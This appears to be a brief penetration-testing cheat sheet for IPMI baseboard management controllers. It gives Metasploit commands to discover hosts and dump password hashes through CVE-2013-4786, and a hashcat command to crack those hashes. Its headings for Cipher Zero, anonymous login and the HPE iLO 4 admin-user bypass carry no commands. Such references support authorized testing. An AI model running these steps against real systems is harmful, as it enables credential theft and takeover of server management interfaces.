IPMI
Intelligent Platform Management Interface
Discovery
msf > use auxiliary/scanner/ipmi/ipmi_version
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run
Dump Hashes
CVE-2013-4786
Dump hashes:
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf > set OUTPUT_HASHCAT_FILE ipmi_hashes.txt
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run
Recover plaintext passwords:
$ hashcat -m 7300 -O -a 0 -w 3 --session=ipmi -o ipmi.out ipmi.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule --username
Cipher Zero
CVE-2013-4805
Discover with MSF:
Guess existing admin username. If ADMIN username is correct, the list command will succeed (password doesn't matter):
Add new admin user (only existing admin username is needed):
Anonymous Authentication
Can be discovered with MSF ipmi_dumphashes but also with ipmitool:
Change password of a named user account:
HPE iLO 4
Add Admin User
CVE-2017-12542
Exploit with Python:
Exploit with MSF: